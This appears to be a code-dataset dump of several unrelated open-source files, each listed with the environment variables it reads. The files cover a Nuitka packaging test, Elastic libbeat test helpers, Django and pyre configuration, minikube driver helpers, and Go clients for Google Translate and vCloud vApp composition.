# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Test runners test
This shows that typical test runners like nose and py.test can be used with
compiled packages.
"""
import os
import sys
# Find nuitka package relative to us.
sys.path.insert(
0,
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")
),
)
# isort:start
import subprocess
from nuitka.tools.testing.Common import getTempDir, my_print, setup
from nuitka.utils.FileOperations import copyTree
def main():
_python_version = setup()
os.chdir("subject")
nuitka_main_path = os.path.join("..", "..", "..", "bin", "nuitka")
tmp_dir = getTempDir()
command = [
os.environ["PYTHON"],
nuitka_main_path,
"--plugin-enable=pylint-warnings",
"--output-dir=%s" % tmp_dir,
"--follow-imports",
"--include-package=package",
"--nofollow-import-to=*.tests",
"--python-flag=-v",
"--debug",
"--module",
"package",
]
result = subprocess.call(command)
if result != 0:
sys.exit(result)
os.makedirs(os.path.join(tmp_dir, "package.ext"))
copyTree("package", os.path.join(tmp_dir, "package.ext/package"))
os.chdir(tmp_dir)
# We compile the package non-closed, so we can smuggle in tests
# and user code. This is going to be the example code.
with open("package.ext/package/user_provided.py", "w") as output:
# TODO: Maybe assert that the type name of a local function and one from
# the package are not the same, i.e. we are running inside the compiled
# package.
output.write(
"""
from __future__ import print_function
import package
print("__name__:", package.__name__)
print("__package__:", package.__package__)
print("__path__:", package.__path__)
print("__file__:", package.__file__)
# print("__loader__:", package.__loader__)
import package.sub_package1
print("__name__:", package.sub_package1.__name__)
print("__package__:", package.sub_package1.__package__)
print("__path__:", package.sub_package1.__path__)
print("__file__:", package.sub_package1.__file__)
# print("__loader__:", package.sub_package1.__loader__)
import package.sub_package1.tests;
print("__name__:", package.sub_package1.tests.__name__)
print("__package__:", package.sub_package1.tests.__package__)
print("__path__:", package.sub_package1.tests.__path__)
print("__file__:", package.sub_package1.tests.__file__)
# print("__loader__:", package.sub_package1.tests.__loader__)
"""
)
os.makedirs("nose")
with open("nose/usage.txt", "w") as output:
pass
os.system("find | sort")
# Inform about the extra path, format is NUITKA_PACKAGE_fullname where
# dots become "_" and should point to the directory where external code
# to be loaded will live under. Probably should be an absolute path, but
# we avoid it here.
os.environ["NUITKA_PACKAGE_package"] = "./package.ext/package"
    # Let's make sure these do not work; they will be used in the compiled
    # form only.
for module_path in ("__init__.py", "sub_package1__init__.py"):
with open(os.path.join("./package.ext/package", module_path), "w") as output:
output.write("assert False")
# Check the compiled package is functional for importing.
my_print("Running package as basic test:")
command = [os.environ["PYTHON"], "-c", "import package"]
result = subprocess.call(command)
if result != 0:
sys.exit(result)
my_print("Running nose tests:")
# assert os.system(os.environ["PYTHON"] + " -m nose --first-package-wins -s package.sub_package1.tests") == 0
my_print("Running py.test tests:")
command = [
os.environ["PYTHON"],
"-m",
"pytest",
"-v",
"--pyargs",
"package.sub_package1.tests",
]
result = subprocess.call(command)
if result != 0:
sys.exit(result)
if __name__ == "__main__":
main()
| [] | [] | [
"PYTHON",
"NUITKA_PACKAGE_package"
] | [] | ["PYTHON", "NUITKA_PACKAGE_package"] | python | 2 | 0 | |
packages/pyre/shells/User.py | # -*- coding: utf-8 -*-
#
# michael a.g. aïvázis
# orthologue
# (c) 1998-2022 all rights reserved
#
# externals
import os
import pyre
# declaration
class User(pyre.component):
"""
Encapsulation of user specific information
"""
# configurable state
# administrative
name = pyre.properties.str()
name.doc = 'the full name of the user'
username = pyre.properties.str()
username.default = os.environ.get('LOGNAME')
username.doc = "the username"
uid = pyre.properties.str()
uid.default = os.getuid()
uid.doc = "the user's system id"
home = pyre.properties.path()
home.default = os.environ.get('HOME')
home.doc = "the location of the user's home directory"
email = pyre.properties.str()
email.doc = 'the email address of the user'
affiliation = pyre.properties.str()
affiliation.doc = 'the affiliation of the user'
# choices and defaults
externals = pyre.externals.dependencies()
externals.doc = 'the database of preferred instances for each external package category'
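# Illustrative use (a sketch; the attribute values are hypothetical, and in a
# real pyre application they would normally come from configuration files):
#
#   user = User(name='bob')
#   user.email = '[email protected]'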
# end of file
| [] | [] | [
"LOGNAME",
"HOME"
] | [] | ["LOGNAME", "HOME"] | python | 2 | 0 | |
internal/examples/fake/fake.go | // Copyright 2020 Google LLC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package fake
import (
"context"
"fmt"
"log"
"os"
translate "cloud.google.com/go/translate/apiv3"
translatepb "google.golang.org/genproto/googleapis/cloud/translate/v3"
)
// TranslateTextWithConcreteClient translates text to the targetLang using the
// provided client.
func TranslateTextWithConcreteClient(client *translate.TranslationClient, text string, targetLang string) (string, error) {
ctx := context.Background()
log.Printf("Translating %q to %q", text, targetLang)
req := &translatepb.TranslateTextRequest{
Parent: fmt.Sprintf("projects/%s/locations/global", os.Getenv("GOOGLE_CLOUD_PROJECT")),
TargetLanguageCode: targetLang,
Contents: []string{text},
}
resp, err := client.TranslateText(ctx, req)
if err != nil {
return "", fmt.Errorf("unable to translate text: %v", err)
}
translations := resp.GetTranslations()
if len(translations) != 1 {
return "", fmt.Errorf("expected only one result, got %d", len(translations))
}
return translations[0].TranslatedText, nil
}
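// Usage sketch (illustrative, not part of this package's API): construct a
// real client with default credentials and pass it in.
//
//	client, err := translate.NewTranslationClient(context.Background())
//	if err != nil {
//		log.Fatal(err)
//	}
//	translated, err := TranslateTextWithConcreteClient(client, "Hallo Welt", "en-US")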
| [
"\"GOOGLE_CLOUD_PROJECT\""
] | [] | [
"GOOGLE_CLOUD_PROJECT"
] | [] | ["GOOGLE_CLOUD_PROJECT"] | go | 1 | 0 | |
libbeat/tests/system/beat/beat.py | import subprocess
import jinja2
import unittest
import os
import shutil
import json
import signal
import sys
import time
import yaml
from datetime import datetime, timedelta
from .compose import ComposeMixin
BEAT_REQUIRED_FIELDS = ["@timestamp",
"beat.name", "beat.hostname", "beat.version"]
INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False)
class TimeoutError(Exception):
pass
class Proc(object):
"""
Slim wrapper on subprocess.Popen that redirects
both stdout and stderr to a file on disk and makes
sure to stop the process and close the output file when
the object gets collected.
"""
def __init__(self, args, outputfile):
self.args = args
self.output = open(outputfile, "ab")
self.stdin_read, self.stdin_write = os.pipe()
def start(self):
if sys.platform.startswith("win"):
self.proc = subprocess.Popen(
self.args,
stdin=self.stdin_read,
stdout=self.output,
stderr=subprocess.STDOUT,
bufsize=0,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
else:
self.proc = subprocess.Popen(
self.args,
stdin=self.stdin_read,
stdout=self.output,
stderr=subprocess.STDOUT,
bufsize=0,
)
return self.proc
def kill(self):
if sys.platform.startswith("win"):
# proc.terminate on Windows does not initiate a graceful shutdown
# through the process's signal handlers; it just kills it hard. So
# this sends a SIGBREAK instead. You cannot send a SIGINT
# (CTRL_C_EVENT) to a process group on Windows, otherwise a Ctrl+C
# would be sent.
self.proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
self.proc.terminate()
def wait(self):
try:
return self.proc.wait()
finally:
self.output.close()
def check_wait(self, exit_code=0):
actual_exit_code = self.wait()
assert actual_exit_code == exit_code, "Expected exit code to be %d, but it was %d" % (
exit_code, actual_exit_code)
return actual_exit_code
def kill_and_wait(self):
self.kill()
os.close(self.stdin_write)
return self.wait()
def check_kill_and_wait(self, exit_code=0):
self.kill()
os.close(self.stdin_write)
return self.check_wait(exit_code=exit_code)
def __del__(self):
# Ensure the process is stopped.
try:
self.proc.terminate()
self.proc.kill()
except:
pass
# Ensure the output is closed.
try:
self.output.close()
except:
pass
class TestCase(unittest.TestCase, ComposeMixin):
@classmethod
def setUpClass(self):
# Path to test binary
if not hasattr(self, 'beat_name'):
self.beat_name = "beat"
if not hasattr(self, 'beat_path'):
self.beat_path = "."
# Path to test binary
if not hasattr(self, 'test_binary'):
self.test_binary = os.path.abspath(self.beat_path + "/" + self.beat_name + ".test")
# Create build path
build_dir = self.beat_path + "/build"
self.build_path = build_dir + "/system-tests/"
# Start the containers needed to run these tests
self.compose_up()
@classmethod
def tearDownClass(self):
self.compose_down()
def run_beat(self,
cmd=None,
config=None,
output=None,
logging_args=["-e", "-v", "-d", "*"],
extra_args=[],
exit_code=None):
"""
Executes beat.
Waits for the process to finish before returning to
the caller.
"""
proc = self.start_beat(cmd=cmd, config=config, output=output,
logging_args=logging_args,
extra_args=extra_args)
if exit_code != None:
return proc.check_wait(exit_code)
return proc.wait()
def start_beat(self,
cmd=None,
config=None,
output=None,
logging_args=["-e", "-v", "-d", "*"],
extra_args=[]):
"""
Starts beat and returns the process handle. The
caller is responsible for stopping / waiting for the
Proc instance.
"""
# Init defaults
if cmd is None:
cmd = self.test_binary
if config is None:
config = self.beat_name + ".yml"
if output is None:
output = self.beat_name + ".log"
args = [cmd,
"-systemTest",
"-test.coverprofile",
os.path.join(self.working_dir, "coverage.cov"),
"-path.home", os.path.normpath(self.working_dir),
"-c", os.path.join(self.working_dir, config),
]
if logging_args:
args.extend(logging_args)
if extra_args:
args.extend(extra_args)
proc = Proc(args, os.path.join(self.working_dir, output))
proc.start()
return proc
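# Usage sketch (illustrative; the log message shown is hypothetical):
#   proc = self.start_beat()
#   self.wait_until(lambda: self.log_contains("beat is running"))
#   proc.check_kill_and_wait()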
def render_config_template(self, template_name=None,
output=None, **kargs):
# Init defaults
if template_name is None:
template_name = self.beat_name
template_path = "./tests/system/config/" + template_name + ".yml.j2"
if output is None:
output = self.beat_name + ".yml"
template = self.template_env.get_template(template_path)
kargs["beat"] = self
output_str = template.render(**kargs)
output_path = os.path.join(self.working_dir, output)
with open(output_path, "wb") as f:
os.chmod(output_path, 0o600)
f.write(output_str.encode('utf8'))
# Returns output as JSON object with flattened fields (. notation)
def read_output(self,
output_file=None,
required_fields=None):
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
jsons = []
with open(os.path.join(self.working_dir, output_file), "r") as f:
for line in f:
if len(line) == 0 or line[len(line) - 1] != "\n":
# hit EOF
break
try:
jsons.append(self.flatten_object(json.loads(
line, object_pairs_hook=self.json_raise_on_duplicates), []))
except:
print("Fail to load the json {}".format(line))
raise
self.all_have_fields(jsons, required_fields or BEAT_REQUIRED_FIELDS)
return jsons
# Returns output as JSON object
def read_output_json(self, output_file=None):
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
jsons = []
with open(os.path.join(self.working_dir, output_file), "r") as f:
for line in f:
if len(line) == 0 or line[len(line) - 1] != "\n":
# hit EOF
break
event = json.loads(line, object_pairs_hook=self.json_raise_on_duplicates)
del event['@metadata']
jsons.append(event)
return jsons
def json_raise_on_duplicates(self, ordered_pairs):
"""Reject duplicate keys. To be used as a custom hook in JSON unmarshaling
to error out in case of any duplicates in the keys."""
d = {}
for k, v in ordered_pairs:
if k in d:
raise ValueError("duplicate key: %r" % (k,))
else:
d[k] = v
return d
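# Illustrative example: passed as object_pairs_hook, duplicate keys raise
# instead of being silently overwritten:
#   json.loads('{"a": 1, "a": 2}', object_pairs_hook=self.json_raise_on_duplicates)
#   # -> ValueError: duplicate key: 'a'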
def setUp(self):
self.template_env = jinja2.Environment(
loader=jinja2.FileSystemLoader([
self.beat_path,
os.path.abspath(os.path.join(self.beat_path, "../libbeat"))
])
)
# create working dir
self.working_dir = os.path.abspath(os.path.join(
self.build_path + "run", self.id()))
if os.path.exists(self.working_dir):
shutil.rmtree(self.working_dir)
os.makedirs(self.working_dir)
fields_yml = os.path.join(self.beat_path, "fields.yml")
# Only add it if it exists
if os.path.isfile(fields_yml):
shutil.copyfile(fields_yml, os.path.join(self.working_dir, "fields.yml"))
try:
# update the last_run link
if os.path.islink(self.build_path + "last_run"):
os.unlink(self.build_path + "last_run")
os.symlink(self.build_path + "run/{}".format(self.id()),
self.build_path + "last_run")
except:
# symlink is best effort and can fail when
# running tests in parallel
pass
def wait_until(self, cond, max_timeout=10, poll_interval=0.1, name="cond"):
"""
Waits until the cond function returns true,
or until the max_timeout is reached. Calls the cond
function every poll_interval seconds.
If the max_timeout is reached before cond() returns
true, an exception is raised.
"""
start = datetime.now()
while not cond():
if datetime.now() - start > timedelta(seconds=max_timeout):
raise TimeoutError("Timeout waiting for '{}' to be true. ".format(name) +
"Waited {} seconds.".format(max_timeout))
time.sleep(poll_interval)
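# Usage sketch (illustrative; the message and timeout are examples only):
#   self.wait_until(lambda: self.log_contains("started"),
#                   max_timeout=15, name="beat started")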
def get_log(self, logfile=None):
"""
Returns the log as a string.
"""
if logfile is None:
logfile = self.beat_name + ".log"
with open(os.path.join(self.working_dir, logfile), 'r') as f:
data = f.read()
return data
def wait_log_contains(self, msg, logfile=None,
max_timeout=10, poll_interval=0.1,
name="log_contains"):
self.wait_until(
cond=lambda: self.log_contains(msg, logfile),
max_timeout=max_timeout,
poll_interval=poll_interval,
name=name)
def log_contains(self, msg, logfile=None):
"""
Returns true if the give logfile contains the given message.
Note that the msg must be present in a single line.
"""
return self.log_contains_count(msg, logfile) > 0
def log_contains_count(self, msg, logfile=None):
"""
Returns the number of appearances of the given string in the log file
"""
counter = 0
# Init defaults
if logfile is None:
logfile = self.beat_name + ".log"
try:
with open(os.path.join(self.working_dir, logfile), "r") as f:
for line in f:
if line.find(msg) >= 0:
counter = counter + 1
except IOError:
counter = -1
return counter
def output_lines(self, output_file=None):
""" Count number of lines in a file."""
if output_file is None:
output_file = "output/" + self.beat_name
try:
with open(os.path.join(self.working_dir, output_file), "r") as f:
return sum([1 for line in f])
except IOError:
return 0
def output_has(self, lines, output_file=None):
"""
Returns true if the output has a given number of lines.
"""
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
try:
with open(os.path.join(self.working_dir, output_file), "r") as f:
return len([1 for line in f]) == lines
except IOError:
return False
def output_has_message(self, message, output_file=None):
"""
Returns true if the output has the given message field.
"""
try:
return any(line for line in self.read_output(output_file=output_file, required_fields=["message"])
if line.get("message") == message)
except (IOError, TypeError):
return False
def all_have_fields(self, objs, fields):
"""
Checks that the given list of output objects have
all the given fields.
Raises Exception if not true.
"""
for field in fields:
if not all([field in o for o in objs]):
raise Exception("Not all objects have a '{}' field"
.format(field))
def all_have_only_fields(self, objs, fields):
"""
Checks if the given list of output objects have all
and only the given fields.
Raises Exception if not true.
"""
self.all_have_fields(objs, fields)
self.all_fields_are_expected(objs, fields)
def all_fields_are_expected(self, objs, expected_fields,
dict_fields=[]):
"""
Checks that all fields in the objects are from the
given list of expected fields.
"""
for o in objs:
for key in o.keys():
known = key in dict_fields or key in expected_fields
ismeta = key.startswith('@metadata.')
if not(known or ismeta):
raise Exception("Unexpected key '{}' found"
.format(key))
def load_fields(self, fields_doc=None):
"""
Returns a list of fields to expect in the output dictionaries
and a second list that contains the fields that have a
dictionary type.
Reads these lists from the fields documentation.
"""
if fields_doc is None:
fields_doc = self.beat_path + "/_meta/fields.generated.yml"
def extract_fields(doc_list, name):
fields = []
dictfields = []
if doc_list is None:
return fields, dictfields
for field in doc_list:
# Skip fields without name entry
if "name" not in field:
continue
# Chain together names
if name != "":
newName = name + "." + field["name"]
else:
newName = field["name"]
if field.get("type") == "group":
subfields, subdictfields = extract_fields(field["fields"], newName)
fields.extend(subfields)
dictfields.extend(subdictfields)
else:
fields.append(newName)
if field.get("type") in ["object", "geo_point"]:
dictfields.append(newName)
return fields, dictfields
# Not all beats have a fields.generated.yml. Fall back to fields.yml
if not os.path.isfile(fields_doc):
fields_doc = self.beat_path + "/_meta/fields.yml"
# TODO: Make fields_doc path more generic to work with beat-generator
with open(fields_doc, "r") as f:
path = os.path.abspath(os.path.dirname(__file__) + "../../../../_meta/fields.generated.yml")
if not os.path.isfile(path):
path = os.path.abspath(os.path.dirname(__file__) + "../../../../_meta/fields.common.yml")
with open(path) as f2:
content = f2.read()
#content = "fields:\n"
content += f.read()
doc = yaml.safe_load(content)
fields = []
dictfields = []
for item in doc:
subfields, subdictfields = extract_fields(item["fields"], "")
fields.extend(subfields)
dictfields.extend(subdictfields)
return fields, dictfields
def flatten_object(self, obj, dict_fields, prefix=""):
result = {}
for key, value in obj.items():
if isinstance(value, dict) and prefix + key not in dict_fields:
new_prefix = prefix + key + "."
result.update(self.flatten_object(value, dict_fields,
new_prefix))
else:
result[prefix + key] = value
return result
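# Illustrative example: nested keys are joined with dots unless the parent
# key is listed in dict_fields:
#   flatten_object({"beat": {"name": "x"}}, [])       -> {"beat.name": "x"}
#   flatten_object({"beat": {"name": "x"}}, ["beat"]) -> {"beat": {"name": "x"}}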
def copy_files(self, files, source_dir="files/", target_dir=""):
if target_dir:
target_dir = os.path.join(self.working_dir, target_dir)
else:
target_dir = self.working_dir
for file_ in files:
shutil.copy(os.path.join(source_dir, file_),
target_dir)
def output_count(self, pred, output_file=None):
"""
Returns true if the output line count predicate returns true
"""
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
try:
with open(os.path.join(self.working_dir, output_file), "r") as f:
return pred(len([1 for line in f]))
except IOError:
return False
def get_elasticsearch_url(self):
"""
Returns an elasticsearch.Elasticsearch instance built from the
env variables like the integration tests.
"""
return "http://{host}:{port}".format(
host=os.getenv("ES_HOST", "localhost"),
port=os.getenv("ES_PORT", "9200"),
)
def get_kibana_url(self):
"""
Returns kibana host URL
"""
return "http://{host}:{port}".format(
host=os.getenv("KIBANA_HOST", "localhost"),
port=os.getenv("KIBANA_PORT", "5601"),
)
| [] | [] | [
"ES_HOST",
"ES_PORT",
"INTEGRATION_TESTS",
"KIBANA_HOST",
"KIBANA_PORT"
] | [] | ["ES_HOST", "ES_PORT", "INTEGRATION_TESTS", "KIBANA_HOST", "KIBANA_PORT"] | python | 5 | 0 | |
app/app/settings.py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o97w%5e16s&_(o#_z$np4@s*%g40tbqvtk!62uxukfgs&0yc(j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
'recipe',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
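# A minimal sketch of the environment these settings expect (host and
# credentials below are illustrative only), e.g. in docker-compose or a shell:
#   export DB_HOST=db DB_NAME=app DB_USER=postgres DB_PASS=supersecretpassword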
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = '/vol/web/media'
STATIC_ROOT = '/vol/web/static'
AUTH_USER_MODEL = 'core.user' | [] | [] | [
"DB_PASS",
"DB_USER",
"DB_NAME",
"DB_HOST"
] | [] | ["DB_PASS", "DB_USER", "DB_NAME", "DB_HOST"] | python | 4 | 0 | |
minikube/drivers/common.py | #!/usr/bin/env python
# -*- coding: utf-8
import os
def has_utility(cmd):
path = os.environ['PATH']
return any(os.access(os.path.join(p, cmd), os.X_OK) for p in path.split(os.pathsep))
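# Usage sketch (illustrative; the binary name is an example): guard driver
# selection on the required executables being present.
#   if not has_utility('VBoxManage'):
#       raise RuntimeError('VirtualBox is not installed')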
def is_macos():
return os.uname()[0] == 'Darwin'
class Driver(object):
arch = "amd64"
@property
def name(self):
raise NotImplementedError("Subclass must set name")
@property
def arguments(self):
return "--vm-driver", self.name
class LinuxDriver(Driver):
os = "linux"
class MacDriver(Driver):
os = "darwin"
| [] | [] | [
"PATH"
] | [] | ["PATH"] | python | 1 | 0 | |
vendor/github.com/ukcloud/govcloudair/vapp.go | /*
* Copyright 2014 VMware, Inc. All rights reserved. Licensed under the Apache v2 License.
*/
package govcloudair
import (
"bytes"
"encoding/xml"
"fmt"
"log"
"net/url"
"os"
types "github.com/ukcloud/govcloudair/types/v56"
"strconv"
)
type VApp struct {
VApp *types.VApp
c *Client
}
func NewVApp(c *Client) *VApp {
return &VApp{
VApp: new(types.VApp),
c: c,
}
}
func (v *VCDClient) NewVApp(c *Client) VApp {
newvapp := NewVApp(c)
return *newvapp
}
func (v *VApp) Refresh() error {
if v.VApp.HREF == "" {
return fmt.Errorf("cannot refresh, Object is empty")
}
u, _ := url.ParseRequestURI(v.VApp.HREF)
req := v.c.NewRequest(map[string]string{}, "GET", *u, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return fmt.Errorf("error retrieving task: %s", err)
}
// Empty struct before a new unmarshal, otherwise we end up with duplicate
// elements in slices.
v.VApp = &types.VApp{}
if err = decodeBody(resp, v.VApp); err != nil {
return fmt.Errorf("error decoding task response: %s", err)
}
// The request was successful
return nil
}
func (v *VApp) AddVM(orgvdcnetworks []*types.OrgVDCNetwork, vapptemplate VAppTemplate, name string) (Task, error) {
vcomp := &types.ReComposeVAppParams{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Deploy: false,
Name: v.VApp.Name,
PowerOn: false,
Description: v.VApp.Description,
SourcedItem: &types.SourcedCompositionItemParam{
Source: &types.Reference{
HREF: vapptemplate.VAppTemplate.Children.VM[0].HREF,
Name: name,
},
InstantiationParams: &types.InstantiationParams{
NetworkConnectionSection: &types.NetworkConnectionSection{
Type: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.Type,
HREF: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.HREF,
Info: "Network config for sourced item",
PrimaryNetworkConnectionIndex: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.PrimaryNetworkConnectionIndex,
},
},
},
}
for index, orgvdcnetwork := range orgvdcnetworks {
vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection = append(vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection,
&types.NetworkConnection{
Network: orgvdcnetwork.Name,
NetworkConnectionIndex: index,
IsConnected: true,
IPAddressAllocationMode: "POOL",
},
)
vcomp.SourcedItem.NetworkAssignment = append(vcomp.SourcedItem.NetworkAssignment,
&types.NetworkAssignment{
InnerNetwork: orgvdcnetwork.Name,
ContainerNetwork: orgvdcnetwork.Name,
},
)
}
log.Printf("%s", vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection)
output, _ := xml.MarshalIndent(vcomp, " ", " ")
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/recomposeVApp"
log.Printf("[TRACE] Recompose XML: %s", string(output))
b := bytes.NewBufferString(xml.Header + string(output))
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.recomposeVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error instantiating a new VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding task response: %s", err)
}
return *task, nil
}
func (v *VApp) RemoveVM(vm VM) error {
v.Refresh()
task := NewTask(v.c)
if v.VApp.Tasks != nil {
for _, t := range v.VApp.Tasks.Task {
task.Task = t
err := task.WaitTaskCompletion()
if err != nil {
return fmt.Errorf("Error performing task: %#v", err)
}
}
}
vcomp := &types.ReComposeVAppParams{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
DeleteItem: &types.DeleteItem{
HREF: vm.VM.HREF,
},
}
output, _ := xml.MarshalIndent(vcomp, " ", " ")
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/recomposeVApp"
b := bytes.NewBufferString(xml.Header + string(output))
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.recomposeVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return fmt.Errorf("error instantiating a new vApp: %s", err)
}
task = NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return fmt.Errorf("error decoding task response: %s", err)
}
err = task.WaitTaskCompletion()
if err != nil {
return fmt.Errorf("Error performing task: %#v", err)
}
return nil
}
func (v *VApp) ComposeVApp(orgvdcnetworks []*types.OrgVDCNetwork, vapptemplate VAppTemplate, storageprofileref types.Reference, name string, description string) (Task, error) {
if vapptemplate.VAppTemplate.Children == nil || orgvdcnetworks == nil {
return Task{}, fmt.Errorf("can't compose a new vApp, objects passed are not valid")
}
// Build request XML
vcomp := &types.ComposeVAppParams{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Deploy: false,
Name: name,
PowerOn: false,
Description: description,
InstantiationParams: &types.InstantiationParams{
NetworkConfigSection: &types.NetworkConfigSection{
Info: "Configuration parameters for logical networks",
},
},
SourcedItem: &types.SourcedCompositionItemParam{
Source: &types.Reference{
HREF: vapptemplate.VAppTemplate.Children.VM[0].HREF,
Name: vapptemplate.VAppTemplate.Children.VM[0].Name,
},
InstantiationParams: &types.InstantiationParams{
NetworkConnectionSection: &types.NetworkConnectionSection{
Type: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.Type,
HREF: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.HREF,
Info: "Network config for sourced item",
PrimaryNetworkConnectionIndex: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.PrimaryNetworkConnectionIndex,
},
},
},
}
for index, orgvdcnetwork := range orgvdcnetworks {
vcomp.InstantiationParams.NetworkConfigSection.NetworkConfig = append(vcomp.InstantiationParams.NetworkConfigSection.NetworkConfig,
types.VAppNetworkConfiguration{
NetworkName: orgvdcnetwork.Name,
Configuration: &types.NetworkConfiguration{
FenceMode: "bridged",
ParentNetwork: &types.Reference{
HREF: orgvdcnetwork.HREF,
Name: orgvdcnetwork.Name,
Type: orgvdcnetwork.Type,
},
},
},
)
vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection = append(vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection,
&types.NetworkConnection{
Network: orgvdcnetwork.Name,
NetworkConnectionIndex: index,
IsConnected: true,
IPAddressAllocationMode: "POOL",
},
)
vcomp.SourcedItem.NetworkAssignment = append(vcomp.SourcedItem.NetworkAssignment,
&types.NetworkAssignment{
InnerNetwork: orgvdcnetwork.Name,
ContainerNetwork: orgvdcnetwork.Name,
},
)
}
if storageprofileref.HREF != "" {
vcomp.SourcedItem.StorageProfile = &storageprofileref
}
output, err := xml.MarshalIndent(vcomp, " ", " ")
if err != nil {
return Task{}, fmt.Errorf("error marshaling vapp compose: %s", err)
}
log.Printf("\n\nXML DEBUG: %s\n\n", string(output))
b := bytes.NewBufferString(xml.Header + string(output))
s := v.c.VCDVDCHREF
s.Path += "/action/composeVApp"
req := v.c.NewRequest(map[string]string{}, "POST", s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.composeVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error instantiating a new vApp: %s", err)
}
if err = decodeBody(resp, v.VApp); err != nil {
return Task{}, fmt.Errorf("error decoding vApp response: %s", err)
}
task := NewTask(v.c)
task.Task = v.VApp.Tasks.Task[0]
// The request was successful
return *task, nil
}
